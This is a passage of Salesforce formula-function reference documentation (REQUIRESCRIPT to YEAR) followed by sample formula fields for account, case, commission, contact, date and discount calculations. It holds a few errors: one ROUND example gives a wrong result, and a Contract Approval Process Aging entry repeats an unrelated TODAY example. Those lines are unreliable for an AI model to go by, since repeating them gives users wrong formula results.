customer success.

If you use the regular expression, Marc Benioff, the only string that this regular
expression will match is:

Marc Benioff

• Capture groups and substitutions are ignored.
• This function is available everywhere formulas exist except formula fields and custom

buttons and links.

REQUIRESCRIPT

Returns a script tag with source for a URL you specify. Use this function when referencing
the Force.com AJAX Toolkit or other JavaScript toolkits.

Description:

{!REQUIRESCRIPT(url)} and replace url with the link for the script that is required.

For the AJAX Toolkit:

{!requireScript("/soap/ajax/13.0/connection.js")}

Use:

Returns:

<script src="/soap/ajax/13.0/connection.js"></script>

For Dojo:

{!requireScript("/js/dojo/0.3.1/dojo.js")}

3076

Formula Operators and FunctionsEnhancing Your Objects, Data, and Fields

http://java.sun.com/javase/6/docs/api/java/util/regex/Pattern.html


Returns:

<script src="/js/dojo/0.3.1/dojo.js"></script>

{!REQUIRESCRIPT("/soap/ajax/13.0/connection.js")}
var c = new sforce.SObject("Case");

Custom Button Example:

c.id = "{!Case.Id}";
c.Status = "New";
result = sforce.connection.update([c]);
window.location.reload();

This example sets the Status of a case to “New” whenever a user clicks a custom button
from the case detail page. To set this up in your organization, define a custom button for
cases that has the following attributes:

• Display Type is “Detail Page Button”
• Behavior is “Execute JavaScript”
• Content Source is “OnClick JavaScript”

Next, paste the content above into your custom button definition and add it to your case
page layouts.

Tips: • Use global variables to access special merge fields for s-controls.
• Use this function when creating custom buttons or links where you have set the Behavior

to “Execute JavaScript” and Content Source to “OnClick JavaScript” because the
script tag should be outside the OnClick code.

• This function is only available for custom buttons and links that have Content Source
set to “OnClick JavaScript.”

• When working in Visualforce, use INCLUDESCRIPT instead.

RIGHT

Returns the specified number of characters from the end of a text string.Description:

RIGHT(text, num_chars) and replace text with the field or expression you want returned;
replace num_chars with the number of characters from the right you want returned.

Use:

TRIM(LEFT(LastName, 5))&"-"&TRIM(RIGHT(SSN__c, 4)) displays the first five
characters of the a name and the last four characters of asocial security number separated by
a dash. Note that this assumes you have a text custom field called SSN.

Example:

Tips: • Reference auto-number fields as text fields in formulas.
• If the num_chars value is less than zero, Salesforce replaces the value with zero.

ROUND

Returns the nearest number to a number you specify, constraining the new number by a
specified number of digits.

Description:
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ROUND(number, num_digits) and replace number with the field or expression you want
rounded; replace num_digits with the number of decimal places you want to consider when
rounding.

Use:

ROUND (1.5, 0) = 2

ROUND (1.2345, 0) = 1

Example:

ROUND (-1.5, 0) = -2

ROUND (225.49823, 2) = 255.50

Simple Discounting
ROUND(Amount-Amount* Discount_Percent__c,2)

Use this formula to calculate the discounted amount of an opportunity rounded off to two
digits. This example is a number formula field on opportunities that uses a custom percent
field called Discount Percent.

Tips: • Enter zero for num_digits to round a number to the nearest integer.
• Salesforce automatically rounds numbers based on the decimal places you specify. For

example, a custom number field with two decimal places stores 1.50 when you enter
1.49999.

• Salesforce uses the round half-up rounding algorithm. Half-way values are always rounded
up. For example, 1.45 is rounded to 1.5. –1.45 is rounded to –1.5.

• The decimal numbers displayed depend on the decimal places you selected when defining
the field in the custom field wizard. The num_digits represents the number of digits
considered when rounding.

RPAD

Inserts characters that you specify to the right-side of a text string.Description:

RPAD(text, padded_length[, 'pad_string']) and replace the variables:Use:

• text is the field or expression after which you want to insert characters.
• pad_length is the number of total characters in the text string that will be returned.
• pad_string is the character or characters that should be inserted. pad_string is

optional and defaults to a blank space.

If the value in text is longer than pad_string, text is truncated to the size of
padded_length.

Field Name: Padding Default

RPAD(Name, 20)  truncates the Name field after 20 characters. For example, if the name
is mycompany.com, the value returned is “mycompany.com.”

Example:

My_Company: No Change

RPAD('my_company.com', 14, 'z') returns “my_company.com” without change
because it has 14 characters.

Field Name: Padding with a Character

RPAD(Name, 15, 'z') returns “mycompany.comz” .
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Field Name: Truncating

RPAD(Name, 2) truncates the name after the second character. For example, if the name
is mycompany.com, the value returned is “my.”

Ending blank spaces are omitted.Tips:

SQRT

Returns the positive square root of a given number.Description:

SQRT(number) and replace number with the field or expression you want computed into a
square root.

Use:

SQRT(25)returns the square root of 25, which is 5.

Amplitude

Example:

SQRT(Amplitude__c) returns the square root of a custom number field representing the
amplitude of an earthquake.

Tips: • Calculating the square root of a negative number results in an error on the detail page.
• Avoid division by zero errors by including an IF function such as: IF(Amplitude__c

>= 0, SQRT(Amplitude__c), null).

SUBSTITUTE

Substitutes new text for old text in a text string.Description:

SUBSTITUTE(text, old_text, new_text) and replace text with the field or value
for which you want to substitute values, old_text with the text you want replaced, and
new_text with the text you want to replace the old_text.

Use:

SUBSTITUTE(Name, "Coupon", "Discount")returns the name of an opportunity that
contains the term “Coupon” with the opportunity name plus “Discount” wherever the term
“Coupon” existed.

Example:

SUBSTITUTE(Email, LEFT(Email, FIND("@", Email)), "www.") finds the
location of the @ sign in a person's email address to determine the length of text to replace
with a “www.” as a means of deriving their website address.

Tips: • Each term provided in quotes is case sensitive.
• If the old_text appears more than once, each occurrence is replaced with the new_text

value provided even when that results in duplicates.

TEXT

Converts a percent, number, date, date/time, or currency type field into text anywhere formulas
are used. Also, converts picklist values to text in validation rules, formula fields, and field
updates.

Description:
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TEXT(value) and replace value with the field or expression you want to convert to text
format. Avoid using any special characters besides a decimal point (period) or minus sign
(dash) in this function.

Use:

Expected Revenue in Text

TEXT(ExpectedRevenue) returns the expected revenue amount of an opportunity in text
format without a dollar sign. For example, if the Expected Revenue of a campaign is
"$200,000," this formula field displays “200000.”

Example:

Asset ID

SerialNumber &"-"& TEXT(Quantity) returns an asset ID number starting with the
serial number and ending with the quantity separated by a dash. The Serial Number field
is already text but the Quantity field is a number, requiring the TEXT function before it.

Use Picklist Values in Math Equations

VALUE(LEFT(TEXT(Quantity), 5)) * Unit

This formula multiplies the first five numbers of the Quantity picklist by the Unit numeric
field.

Compare Two Picklists

IF(TEXT(bug_status) = TEXT(case_status), “Match”, “Out of Sync”)

This formula compares the values of the bug_status picklist with values of the
case_status picklist.

Display Picklist Values From Parent Records

TEXT(Account.Industry)

This formula field on opportunities shows the industry of the associated account.

Concatenate Picklist Values

TEXT(Account.Industry) & " - " & TEXT(Account.SubIndustry__c)

This formula field on opportunities shows the industry and subindustry of the associated
account.

Block the Save of a Closed Opportunity

CONTAINS(TEXT(Status), "Closed") returns TRUE if the Status picklist contains
the value “Closed,” such as “Closed Won” and “Closed Lost.” This validation rule formula
blocks users from saving changes to a closed opportunity.

Validation Rule Examples:

Use Numeric Functions on Numeric Picklist Values

VALUE(LEFT(TEXT(Quantity), 5)) * Unit > 10000 multiplies the first five numbers
of the Quantity picklist by the Unit numeric field, and returns TRUE if the result is greater
than 10,000.

Directly Compare Two Picklists

TEXT(bug_status) = TEXT(case_status) compares the values of the bug_status
picklist with values of the case_status picklist, and returns TRUE if they are equal.
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Tips: • The returned text is not formatted with any currency, percent symbols, or commas.
• Values are not sensitive to locale. For example, 24.42 EUR are converted into the number

24.42.
• Percents are returned in the form of a decimal.
• Dates are returned in the form of YYYY-MM-DD, that is, a four-digit year and two-digit

month and day.
• Date/time values are returned in the form of YYYY-MM-DD HH:MM:SSZ where

YYYY is a four-digit year, MM is a two-digit month, DD is a two-digit day, HH is the
two-digit hour, MM are the minutes, SS are the seconds, and Z represents the zero
meridian indicating the time is returned in UTC time zone.

• Picklist fields are only supported in TEXT functions used in validation rule formulas,
formula fields, and field updates. In other formulas, use ISPICKVAL or CASE when
referencing a picklist field.

• The TEXT function always returns picklist values in your organization's master language,
not the language of the current user.

TODAY

Returns the current date as a date data type.Description:

TODAY()Use:

TODAY()-Sample_date_c calculates how many days in the sample are left.Example:

SampleDate < TODAY()Validation Rule Example:

This example ensures that users cannot change the Sample Date to any date in the past.

Tips: • Do not remove the parentheses.
• Keep the parentheses empty. They do not need to contain a value.
• Use a date field with a TODAY function instead of a date/time field. Last Activity

Date is a date field whereas Created Date and Last Modified Date are date/time
fields.

• See NOW if you prefer to use a date/time field.
• Dates and times are always calculated using the user’s time zone.
• Use addition and subtraction operators with a TODAY function and other date fields to

return a number, representing number of days. For example
TODAY()-LastActivityDate calculates the number of days since the last activity
date. In this example, the formula field data type is a number.

• Use addition and subtraction operators with a TODAY function and numbers to return
a date. For example TODAY() +5 calculates the date five days ahead of today. In this
example, the formula field data type is a date.

TRIM

Removes the spaces and tabs from the beginning and end of a text string.Description:

TRIM(text) and replace text with the field or expression you want to trim.Use:
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TRIM(LEFT(LastName,5))& "-" & RIGHT(FirstName, 1) returns a network ID
for users that contains the first five characters of their last name and first character of their
first name separated by a dash.

Example:

UPPER

Converts all letters in the specified text string to uppercase. Any characters that are not letters
are unaffected by this function. Locale rules are applied if a locale is provided.

Description:

UPPER(text, [locale]) and replace text with the field or expression you wish to convert
to uppercase, and locale with the optional two-character ISO language code or five-character
locale code, if available.

Use:

MYCOMPANY.COM

UPPER("mycompany.com") returns “MYCOMPANY.COM.”

Example:

MYCOMPANY.COM 123

UPPER("Mycompany.com 123") returns “MYCOMPANY.COM 123.”

Applying Turkish Language Locale Rules

The Turkish language has two versions of the letter i: one dotted and one dotless. The locale
rules for Turkish require the ability to capitalize the dotted i, and allow the dotless I to be
lowercase. To correctly use the UPPER() function with the Turkish language locale, use the
Turkish locale code tr in the UPPER() function as follows:

UPPER(text, "tr")

This ensures that any dotted i in the text does not transform to a dotless I.

URLENCODE

Encodes text and merge field values for use in URLs by replacing characters that are illegal
in URLs, such as blank spaces, with the code that represent those characters as defined in

Description:

RFC 3986, Uniform Resource Identifier (URI): Generic Syntax. For example, blank spaces are
replaced with %20, and exclamation points are replaced with %21.

{!URLENCODE(text)} and replace text with the merge field or text string that you want
to encode.

Use:

If the merge field foo__c contains <B>Mark's page<b>, {!URLENCODE(foo_c)} results
in: %3CB%3EMark%27s%20page%3C%2Fb%3E

Example:

Tips: • This function is only available in custom buttons and links.
• Custom buttons and links with URL content sources have separate encoding settings. If

you use the URLENCODE function to encode a custom button or link that has an
encoding setting specified, Salesforce first encodes the URL according to the custom
button or link setting, then encodes the result. For example, if the URL in a custom link
contains a space and its encoding setting is UTF8, Salesforce first encodes the space to
a plus sign (+), then the URLENCODE function converts the plus sign to its character
code, %2B.

• When you include the standard Account field on opportunities
(Opportunity.Account) in the URLENCODE function, the value of the field is the
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account ID, not the account name. To encode the account name, create a custom
cross-object formula field on opportunities that spans to the account name, and use that
field in the URLENCODE function instead of Opportunity.Account. For example,
if the cross-object formula is AccountNameFormula__c, use the following:

http://www.google.com/search?q={!URLENCODE
(Opportunity.AccountNameFormula__c)}

URLFOR

Returns a relative URL for an action, s-control, Visualforce page, or a file in a static resource
archive in a Visualforce page.

Description:

{!URLFOR(target, id, [inputs], [no override])} and replace target with the
URL or action, s-control, or static resource merge variable, id with a reference to the record,

Use:

and inputs with any optional parameters. The no override argument is also optional
and defaults to “false.” It applies to targets for standard Salesforce pages such as
$Action.Account.New. Replace no override with “true” when you want to display a
standard Salesforce page regardless of whether you have defined an override for it elsewhere.

To access a Visualforce page, simple enter the name of your page preceeded by an “apex/.”
For example, if your Visualforce page is named myTestPage, you would use
{!URLFOR("apex/myTestPage"}.

<apex:image url="{!URLFOR($Resource.TestZip,
'images/Bluehills.jpg')}" width="50" height="50"/>

Visualforce Example:

In this example, the <apex:image> component references a .jpg file contained within a
.zip file that has been uploaded as a static resource. When uploaded, the name of the static
resource was defined as TestZip, and the path to the image within the resource is
images/Bluehills.jpg.

Tips: • Use global variables to access special merge fields for actions, s-controls, and static
resources.

• If an input parameter name begins with any character other than a letter or dollar sign
($), enclose it in quotation marks.

• Enclose multiple inputs in brackets to indicate they are together:

{!URLFOR($Action.Case.View, Case.Id, [parm1="A", parm2="B"])}

• Set inputs to null if you do not have any to pass yet you want to set the no override
argument:

{!URLFOR($Action.Case.View, Case.Id, null, true)}

• When you override a standard action, that action is no longer available in Salesforce. For
example, if you override the new account action, that affects the New button on all pages
such as the account detail page, account related lists on other detail pages, and the Create
New drop down list in the sidebar. To override a standard action yet still access it, use
the no override argument in your s-control to reference that action.
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• When you override the tab home page for a standard or custom tab, set target to the
“Tab” $Action global variable and id to the object type. For example,
URLFOR($Action.Account.Tab, $ObjectType.Account)

• This function is only available in custom buttons, links, s-controls, and Visualforce pages.

VALUE

Converts a text string to a number.Description:

VALUE(text) and replace text with the field or expression you want converted into a
number.

Use:

Lead Number

VALUE(Lead_Number__c) returns a number for the text value in the auto-number field
Lead Number. This can be useful if you want to use the Lead Number field in a calculation.

Example:

Note that auto-number fields are actually text fields and must be converted to a number for
numeric calculations.

Round Robin Lead Assignment
MOD(VALUE(Lead_Number__c), 3)

This formula is for a custom formula field named Round_Robin_ID that assigns each lead
a value of 0, 1, or 2. This formula uses a custom auto-number field called Lead Number
that assigns each lead a unique number starting with 1. The MOD function divides the lead
number by the number of lead queues available (three in this example) and returns a remainder
of 0, 1, or 2. Use the value of this formula field in your lead assignment rules to assign lead
records to different queues. For example:

• Round_Robin_ID = 0 is assigned to Queue A
• Round_Robin_ID = 1 is assigned to Queue B
• Round_Robin_ID = 2 is assigned to Queue C

Make sure the text in a VALUE function does not include any special characters other than
a decimal point (period) or minus sign (dash). For example, the formula
VALUE(Text_field__c) produces these results:

Tips:

• If Text field is 123, the result is 123
• If Text field is blank, the result is #Error!
• If Text field is $123, the result is #Error!
• If Text field is EUR123, the result is #Error!

VLOOKUP

Returns a value by looking up a related value on a custom object similar to the VLOOKUP()
Excel function.

Description:

VLOOKUP(field_to_return, field_on_lookup_object, lookup_value) and
replace field_to_return with the field that contains the value you want returned,

Use:

field_on_lookup_object with the field on the related object that contains the value you
want to match, and lookup_value with the value you want to match.
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This example checks that a billing postal code is valid by looking up the first five characters
of the value in a custom object called Zip_Code__c that contains a record for every valid zip

Validation Rule Example:

code in the US. If the zip code is not found in the Zip_Code__c object or the billing state
does not match the corresponding State_Code__c in the Zip_Code__c object, an error is
displayed.

AND( LEN(BillingPostalCode) > 0, OR(BillingCountry = "USA",
BillingCountry = "US"),

VLOOKUP(
$ObjectType.Zip_Code__c.Fields.State_Code__c,
$ObjectType.Zip_Code__c.Fields.Name, LEFT(BillingPostalCode,5)) <>

BillingState )

Note:

• Use this example when the billing country is US or USA.
• You can download US zip codes in CSV file format from

http://zips.sourceforge.net.

Tips: • The field_to_return must be an auto number, roll-up summary, lookup relationship,
master-detail relationship, checkbox, date, date/time, email, number, percent, phone,
picklist, text, text area, or URL field type.

• The field_on_lookup_object must be the Record Name field on a custom object.
• The field_on_lookup_object and lookup_value must be the same data type.
• If more than one record matches, the value from the first record is returned.
• The value returned must be on a custom object.
• You cannot delete the custom field or custom object referenced in this function.
• This function is only available in validation rules.

YEAR

Returns the four-digit year in number format of a given date.Description:

YEAR(date) and replace date with the field or expression that contains the year you want
returned.

Use:

YEAR(TODAY())- YEAR(Initial_Meeting__c) returns the number of years since your
initial meeting with a client. This example uses a custom date field called Initial Meeting.

Example:

See Also:
Operators and Functions A – H
Formula Operators and Functions
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Examples of Advanced Formula Fields
Available in: All Editions

User Permissions Needed

“View Setup and Configuration”To view formula field details:

“Customize Application”To create, change, or delete formula fields:

This document contains custom formula samples for the following topics. For details about using the functions included in
these samples, see Formula Operators and Functions on page 3037.

• Account Management

• Account Media Service Links

• Case Management

• Commission Calculations

• Contact Management

• Data Categorization

• Date Calculations

• Discounting

• Employee Services

• Expense Tracking

• Financial Calculations

• Image Links

• Integration Links

• Lead Management

• Metrics

• Opportunity Management

• Pricing

• Project Management

• Scoring Calculations

See Also:
Formulas: How Do I...
Tips on Building Formulas
Quick Reference Guide: Formula Fields
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Account Management

Account Rating

This formula evaluates Annual Revenue, Billing Country, and Type, and assigns a value of “Hot,” “Warm,” or “Cold.”

IF (AND (AnnualRevenue > 10000000,
CONTAINS (CASE (BillingCountry, "United States", "US", "America", "US", "USA", "US", "NA"),
"US")),
IF(ISPICKVAL(Type, "Manufacturing Partner"), "Hot",
IF(OR (ISPICKVAL (Type, "Channel Partner/Reseller"),
ISPICKVAL(Type, "Installation Partner")), "Warm", "Cold")),
"Cold")

In addition, you can reference this Account Rating formula field from the contact object using cross-object formulas.

Account.Account_Rating__c

Account Region

This formula returns a text value of “North,” “South,” “East,” “West,” or “Central” based on the Billing State/Province
of the account.

IF(ISBLANK(BillingState), "None",
IF(CONTAINS("AK:AZ:CA:HA:NV:NM:OR:UT:WA", BillingState), "West",
IF(CONTAINS("CO:ID:MT:KS:OK:TX:WY", BillingState), "Central",
IF(CONTAINS("CT:ME:MA:NH:NY:PA:RI:VT", BillingState), "East",
IF(CONTAINS("AL:AR:DC:DE:FL:GA:KY:LA:MD:MS:NC:NJ:SC:TN:VA:WV", BillingState), "South",
IF(CONTAINS("IL:IN:IA:MI:MN:MO:NE:ND:OH:SD:WI", BillingState), "North", "Other"))))))

Contract Aging

This formula calculates the number of days since a contract with an account was activated. If the contract Status is not
“Activated,” this field is blank.

IF(ISPICKVAL(Contract_Status__c, "Activated"),
NOW() - Contract_Activated_Date__c, null)

Contract Approval Process Aging

This formula  calculates how many days in the sample are left.

TODAY()-Sample_date_c

Month of Last Account Activity

This formula field displays the month of the last activity or “None” if there are no activities.

CASE(MONTH(LastActivityDate),
1, "January",
2, "February",
3, "March",
4, "April",
5, "May",
6, "June",
7, "July",
8, "August",
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9, "September",
10, "October",
11, "November",
12, "December",
"None")

Month of Service-Level Agreement Expiration

This formula  returns the month that your service-level agreement expires. This example uses a custom date field called SLA
Expiration Date.

MONTH(SLAExpirationDate__c)

Account Media Service Links

BBC™ News Search

This formula creates a link to a BBC news search site based on the Account Name.

HYPERLINK(
"http://newssearch.bbc.co.uk/cgi-bin/search/results.pl?scope=newsifs;tab=news;q="&Name,
"BBC News")

Bloomberg™ News Search

This formula creates a link to an account's ticker symbol on the Bloomberg website.

HYPERLINK(
"http://www.bloomberg.com/apps/quote?ticker="&TickerSymbol,
"Bloomberg News")

CNN™ News Search

This formula creates a link to a CNN news search site using the Account Name.

HYPERLINK(
"http://websearch.cnn.com/search/search?source=cnn&
invocationType=search%2Ftop&sites=web&query="&Name,
"CNN News")

MarketWatch™ Search

This formula creates a link to an account's ticker symbol on the Marketwatch.com website.

HYPERLINK(
"http://www.marketwatch.com/tools/quotes/quotes.asp?symb="&TickerSymbol,
"Marketwatch")
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Google™ Search

This formula creates a link to a Google search site using the Account Name.

HYPERLINK(
"http://www.google.com/search?en&q="&Name,
"Google")

Google News Search

This formula creates a link to a Google news search site using the Account Name.

HYPERLINK(
"http://www.google.com/news?en&q="&Name,
"Google News")

Yahoo!™ Search

This formula creates a link to a Yahoo! search site using the Account Name.

HYPERLINK(
"http://search.yahoo.com/search?p="&Name,
"Yahoo Search")

Yahoo! News Search

This formula creates a link to a Yahoo! news search site using the Account Name.

HYPERLINK(
"http://news.search.yahoo.com/search/news?p="&Name,
"Yahoo News")

Case Management

Autodial

This formula creates a linkable phone number field that automatically dials the phone number when clicked. In this example,
replace "servername" and "call" with the name of your dialing tool and the command it uses to dial. The merge field,
Id, inserts the identifier for the contact, lead, or account record. The first Phone merge field tells the dialing tool what number
to call and the last Phone merge field uses the value of the Phone field as the linkable text the user clicks to dial.

HYPERLINK("http://servername/call?id="
& Id & "&phone=" & Phone, Phone)

Case Aging (Assignments)

Use this example of a custom formula field called Days Open to display different text depending on the number of days a
case has been open:

CASE(Days_Open__c, 3,
"Reassign", 2, "Assign Task", "Maintain")

The following text is displayed:
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• “Reassign” for any case open three days.
• “Assign Task” for any case open two days.
• “Maintain” for all other cases.

Case Aging (Open Cases)

This formula calculates the number of days a case has been open. If the case is closed, it sets the result to null. Add this formula
to a related list as the sort column to quickly see which open cases have been open the longest. The formula returns zero if the
case has been open for less than 24 hours.

IF(IsClosed,
null,
NOW() - CreatedDate )

Case Aging (Open and Closed Cases)

This formula calculates the number of days a closed case was open or the number of days an open case has been open since
the date the case was created. The formula returns zero if the case has been open for less than 24 hours.

IF(IsClosed,
ROUND(ClosedDate - CreatedDate, 0), ROUND((NOW() - CreatedDate),0))

Case Categorization

This formula displays a text value of “RED,” “YELLOW,” or “GREEN,” depending on the value of a case age custom text
field.

IF(DaysOpen__c > 20, "RED",
IF(DaysOpen__c > 10, "YELLOW",
"GREEN") )

Case Data Completeness Tracking

This formula calculates the percentage of specific custom fields that contain data. The formula checks the values of two custom
number fields: Problem Num and Severity Num. If the fields are empty, the formula returns the value “0.” The formula
returns a value of “1” for each field that contains a value and multiplies this total by fifty to give you the percentage of fields
that contain data.

(IF(ISBLANK(Problem_Num__c), 0, 1) + IF(ISBLANK(Severity_Num__c ), 0,1)) * 50

Case Due Date Calculation

This formula sets the due date of a case based on the priority. If it is high, the due date is two days after it opens. If it is
medium, the due date is five days after opening. Otherwise, the due date is seven days.

CASE (Priority,
"High", CreatedDate + 2,
"Medium",CreatedDate + 5,
CreatedDate + 7)

Suggested Agent Prompts

This formula prompts an agent with cross-sell offers based on past purchases.

CASE(Product_Purch__c,
"Printer", "Extra toner cartridges", "Camera", "Memory cards",
"Special of the day")
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Suggested Offers

This formula suggests a product based on the support history for a computer reseller. When the Problem custom field matches
a field, the formula field returns a suggestion.

CASE(Problem__c,
"Memory", "Suggest new memory cards", "Hard Drive failure", "Suggest new hard drive with
tape backup",
"")

Commission Calculations

Commission Amounts for Opportunities

The following is a simple formula where commission is based on a flat 2% of the opportunity Amount.

IF(ISPICKVAL(StageName, "Closed Won"),
ROUND(Amount *0.02, 2), 0)

This example calculates the commission amount for any opportunity that has a “Closed Won” stage. The value of this field
will be the amount times 0.02 for any closed/won opportunity. Open or lost opportunities will have a zero commission value.

Commission Deal Size

This formula calculates a commission rate based on deal size, returning a 9% commission rate for deals over 100,000 and an
8% commission rate for smaller deals.

IF(Amount > 100000, 0.09, 0.08 )

Commission Greater Than or Equal To

This formula  assigns the “YES” value with a commission greater than or equal to one million. Note, this is a text formula
field that uses a custom currency field called Commission.

IF(Commission__c >= 1000000, "YES", "NO")

Commission Maximum

This formula determines what commission to log for an asset based on which is greater: the user's commission percentage of
the price, the price times the discount percent stored for the account or 100 dollars. This example assumes you have two custom
percent fields on users and assets.

MAX($User.Commission_Percent__c * Price,
Price * Account_Discount__c, 100)
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Contact Management

Contact's Account Creation Date

This date formula displays the account's Created Date field on the contacts page.

Account.CreatedDate

Contact's Account Discount Percent

This percent formula displays the account's Discount Percent field on the contacts page.

Account.Discount_Percent__c

Contact's Account Name

This formula displays the standard Account Name field on the contacts page.

Account.Name

Contact's Account Phone

This formula displays the standard Account Phone field on the contacts page.

Account.Phone

Contact's Account Rating

Use this formula to display the Account Rating field on the contacts page.

CASE(Account.Rating, "Hot", "Hot", "Warm", "Warm", "Cold", "Cold", "Not Rated")

Contact's Account Website

This formula displays the standard Account Website field on the contacts page.

Account.Website

If the account website URL is long, use the HYPERLINK function to display a label such as “Click Here” instead of the
URL. For example:

IF(Account.Website="", "",
IF(
OR(LEFT(Account.Website, 7) = "http://",LEFT(Account.Website, 8) = "https://"),
HYPERLINK( Account.Website , "Click Here" ),
HYPERLINK( "http://" & Account.Website , "Click Here" )
)
)

This formula also adds the necessary "http://" or "https://" before a URL if neither were included in the URL field.
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Contact’s Age

Use this formula to calculate a person’s age based on a standard field called Birthdate. The person’s Birthdate is subtracted
from today’s date, which returns the number of days since the person’s Birthdate. This number is divided by the number
of days in a year and rounded down to the nearest integer.

FLOOR((TODAY()-Birthdate)/365.2425)

Contact's Birthday

This formula displays the value “Yes” if the contact’s birthday falls in the current calendar month.

IF (
MONTH( Birthdate) = MONTH( TODAY()), "Yes", "")

Contact's LinkedIn™ Profile

You can configure a link that appears on your contacts' profile page that sends you to their LinkedIn profile. To do so:

1. From Setup, click Customize > Contacts > Buttons, Links and Actions.
2. Click New Button or Link.
3. Enter a Label for this link, like LinkedInLink.
4. Enter this formula in the content box:

http://www.linkedin.com/search/fpsearch?type=people&keywords
={!Contact.FirstName}+{!Contact.LastName}

5. Click Save.

Remember to add this link to the Contact page layout in order for it to show up.

Contact Identification Numbering

This formula displays the first five characters ofta name and the last four characters of a social security number separated by
a dash. Note that this example uses a text custom field called SSN.

TRIM(LEFT(LastName,
5)) & "-" & TRIM(RIGHT(SSN__c, 4))

Contact Preferred Phone

This formula displays the contact’s preferred contact method in a contact related list—work phone, home phone, or mobile
phone—based on a selected option in a Preferred Phone custom picklist.

CASE(Preferred_Phone__c,
"Work", "w. " & Phone,
"Home", "h. " & HomePhone,
"Mobile", "m. " & MobilePhone,
"No Preferred Phone")
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Contact Priority

This formula assesses the importance of a contact based on the account rating and the contact's title. If the account rating is
Hot or the title starts with Executive, then the priority is high (P1). If the account rating is Warm or the title starts with VP
then the priority is medium (P2), and if the account rating is Cold then the priority is low (P3).

IF(OR(ISPICKVAL(Account.Rating, "Hot"), CONTAINS(Title, "Executive")), "P1",

IF(OR(ISPICKVAL(Account.Rating, "Warm"), CONTAINS(Title, "VP")), "P2",

IF(ISPICKVAL(Account.Rating, "Cold"), "P3",

"P3")
)
)

Contact Yahoo! ID

This formula displays a clickable Yahoo! Messenger icon indicating if the person is logged on to the service. Users can click
the icon to launch a Yahoo! Messenger conversation with the person. This example uses a custom text field called Yahoo
Name on contacts where you can store the contact's Yahoo! Messenger ID.

HYPERLINK("ymsgr:sendIM?"
& Yahoo_Name__c, IMAGE("http://opi.yahoo.com/online?u=" &
Yahoo_Name__c & "&m;=g&t;=0", "Yahoo"))

Dynamic Address Formatting

This formula field displays a formatted mailing address for a contact in standard format, including spaces and line breaks
where appropriate depending on the country.

CASE(ShippingCountry,
"USA",
ShippingStreet & BR() &
ShippingCity & ",
" & ShippingState & " " &
ShippingPostalCode & BR()
& ShippingCountry,

"France",
ShippingStreet & BR() &
ShippingPostalCode & " " &
ShippingCity & BR() &
ShippingCountry, "etc")

Telephone Country Code

This formula determines the telephone country code of a contact based on the Mailing Country of the mailing address.

CASE(MailingCountry,
"USA", "1",
"Canada", "1",
"France", "33",
"UK", "44",
"Australia", "61",
"Japan", "81",
"?")
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Unformatted Phone Number

This formula removes the parentheses and dash characters from North American phone numbers. This is necessary for some
auto-dialer software.

IF(Country_Code__c = "1", MID( Phone ,2, 3) & MID(Phone,7,3) & MID(Phone,11,4), Phone)

Data Categorization

Deal Size Large and Small

This formula displays “Large Deal” for deals over one million dollars or “Small Deal” for deals under one million dollars.

IF(Sales_Price__c > 1000000,
"Large Deal",
"Small Deal")

Deal Size Small

This formula displays “Small” if the price and quantity are less than one. This field is blank if the asset has a price or quantity
greater than one.

IF(AND(Price<1,Quantity<1),"Small",
null)

Product Categorization

This formula checks the content of a custom text field named Product_Type and returns “Parts” for any product with the
word “part” in it. Otherwise, it returns “Service.” Note that the values are case sensitive, so if a Product_Type field contains
the text “Part” or “PART,” this formula returns “Services.”

IF(CONTAINS(Product_Type__c, "part"), "Parts", "Service")

Date Calculations

Birthday in Current Year Accounting for Leap Years

This formula returns the date of a person's birthday in the current year, even if the person's birthday is on February 29th in a
leap year.

IF(AND(MONTH(Birthdate) = 2, DAY(Birthdate) = 29),
(IF(OR(MOD(YEAR(DATEVALUE(NOW())), 400) = 0, AND(MOD(YEAR(DATEVALUE(NOW())) ,4) = 0,
MOD(YEAR(DATEVALUE(NOW())), 100) <> 0)),
DATE(YEAR(DATEVALUE(NOW())), MONTH(Birthdate), DAY(Birthdate)),
DATE(YEAR(DATEVALUE(NOW())), MONTH(Birthdate + 1), 28))),
(DATE(YEAR(DATEVALUE(NOW())), MONTH(Birthdate) , DAY(Birthdate))))
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Day of Week (number)

This formula calculates today’s day of the week as a number (0 = Sunday, 1 = Monday, 2 = Tuesday, and so on).

MOD(TODAY() - DATE(1900, 1, 7), 7)

Similarly, this formula substitutes the TODAY() function shown in the previous example with a custom date field called Sign
Up Date. It returns the day of the week as a number for that field.

MOD(Sign_Up_Date__c - DATE(1900, 1, 7), 7)

Day of Week (text)

This formula calculates today’s day of the week and displays it as text. To determine the day of the week for a date field, use
the formula below and replace “TODAY()” with that date field.

CASE(
MOD(TODAY() - DATE(1900, 1, 7), 7),
0, "Sunday",
1, "Monday",
2, "Tuesday",
3, "Wednesday",
4, "Thursday",
5, "Friday",
6, "Saturday", "Error")

Day of Year

This formula calculates today’s numeric day of the year (a number between 1 and 365).

TODAY() – DATE(YEAR(TODAY()), 1, 1) + 1

Days Until End of Month

This formula displays the number of days between a specific date and the end of the month in which the date occurs.

IF(
MONTH(CloseDate)=12,
DATE(YEAR(CloseDate),12,31) - CloseDate,
DATE(YEAR(CloseDate),
MONTH(CloseDate)+1,1) - CloseDate-1)

Time of Day

This formula returns the time of day in Greenwich Mean Time (GMT), for example: “08:04 PM”).

MID (TEXT (Due_Date_Time__c), 12, 5)
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Discounting

Maintenance and Services Discount

This formula field uses two custom currency fields: Maintenance Amount and Services Amount. It displays “Discounted”
on an opportunity if its maintenance amount and services amount do not equal the opportunity Amount standard field value.
Otherwise, it displays "Full Price."

IF(Maintenance_Amount__c + Services_Amount__c <> Amount,
"Discounted",
"Full Price")

Opportunity Discount Amount

This formula calculates the difference of the product Amount less the Discount Amount. Note that Discount Amount
is a custom currency field.

Amount
- Discount_Amount__c

Opportunity Discount Rounded

Use this formula to calculate the discounted amount of an opportunity rounded off to two digits. This example is a number
formula field on opportunities that uses a custom percent field called Discount Percent.

ROUND(Amount-Amount*
Discount_Percent__c,2)

Opportunity Discount with Approval

This formula adds a “Discount Approved” checkbox to an opportunity. It uses conditional logic to check the value of the
approval flag before calculating the commission.

IF(Discount_Approved__c, ROUND(Amount – Amount * DiscountPercent__c, 2), Amount)

Employee Services

Bonus Calculation

This example determines an employee's bonus amount based on the smallest of two amounts: the employee's gross times bonus
percent or an equally divided amount of the company's performance amount among all employees. It assumes you have custom
number field for Number of Employees, a custom percent field for Bonus Percent, and currency custom fields for the
employee's Gross and company's Performance.

MIN(Gross__c * Bonus_Percent__c,
Performance__c / Number_of_Employees__c)
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Employee 401K

